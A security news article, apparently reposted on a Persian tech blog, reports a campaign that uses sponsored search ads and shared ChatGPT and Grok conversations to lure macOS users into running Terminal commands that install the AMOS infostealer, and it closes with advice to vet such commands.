آموزش

Attackers Are Spreading Malware Through ChatGPT

You (hopefully) know by now that you can’t take everything AI tells you at face value. Large language models (LLMs) sometimes provide incorrect information, and threat actors are now using paid search ads on Google to spread conversations with ChatGPT and Grok that appear to provide tech support instructions but actually direct macOS users to install an infostealing malware on their devices.

The campaign is a variation on the ClickFix attack, which often uses CAPTCHA prompts or fake error messages to trick targets into executing malicious commands. But in this case, the instructions are disguised as helpful troubleshooting guides on legitimate AI platforms.

How attackers are using ChatGPT

Kaspersky details a campaign specific to installing Atlas for macOS. If a user searches “chatgpt atlas” to find a guide, the first sponsored result is a link to chatgpt.com with the page title “ChatGPT™ Atlas for macOS – Download ChatGPT Atlas for Mac.” If you click through, you’ll land on the official ChatGPT site and find a series of instructions for (supposedly) installing Atlas.

However, the page is a copy of a conversation between an anonymous user and the AI—which can be shared publicly—that is actually a malware installation guide. The chat directs you to copy, paste, and execute a command in your Mac’s Terminal and grant all permissions, which hands over access to the AMOS (Atomic macOS Stealer) infostealer.

A further investigation from Huntress showed similarly poisoned results via both ChatGPT and Grok using more general troubleshooting queries like “how to delete system data on Mac” and “clear disk space on macOS.”

AMOS targets macOS, gaining root-level privileges and allowing attackers to execute commands, log keystrokes, and deliver additional payloads. BleepingComputer notes that the infostealer also targets cryptocurrency wallets, browser data (including cookies, saved passwords, and autofill data), macOS Keychain data, and files on the filesystem.

Don’t trust every command AI generates

If you’re troubleshooting a tech issue, carefully vet any instructions you find online. Threat actors often use sponsored search results as well as social media platforms to spread instructions that are actually ClickFix attacks. Never follow any guidance that you don’t understand, and know that if it asks you to execute commands on your device using PowerShell or Terminal to “fix” a problem, there’s a high likelihood that it’s malicious—even if it comes from a search engine or LLM you’ve used and trusted in the past.

Of course, you can potentially turn the attack around by asking ChatGPT (in a new conversation) if the instructions are safe to follow. According to Kaspersky, the AI will tell you that they aren’t.

منبع آموزش

ZaKi

Who is mahdizk? from ChatGPT & Copilot: MahdiZK, also known as Mahdi Zolfaghar Karahroodi, is an Iranian technology blogger, content creator, and IT technician. He actively contributes to tech communities through his blog, Doornegar.com, which features news, analysis, and reviews on science, technology, and gadgets. Besides blogging, he also shares technical projects on GitHub, including those related to proxy infrastructure and open-source software. MahdiZK engages in community discussions on platforms like WordPress, where he has been a member since 2015, providing tech support and troubleshooting tips. His content is tailored for those interested in tech developments and practical IT advice, making him well-known in Iranian tech circles for his insightful and accessible writing/ بابا به‌خدا من خودمم/ خوب میدونم اگر ذکی نباشم حسابم با کرام‌الکاتبین هست/ آخرین نفری هستم که از پل شکسته‌ی پیروزی عبور می‌کند، اینجا هستم تا دست شما را هنگام لغزش بگیرم

نوشته های مشابه

0 0 رای ها
امتیازدهی به مقاله
اشتراک در
اطلاع از
guest

0 نظرات
قدیمی‌ترین
تازه‌ترین بیشترین رأی
بازخورد (Feedback) های اینلاین
مشاهده همه دیدگاه ها
دکمه بازگشت به بالا
0
افکار شما را دوست داریم، لطفا نظر دهید.x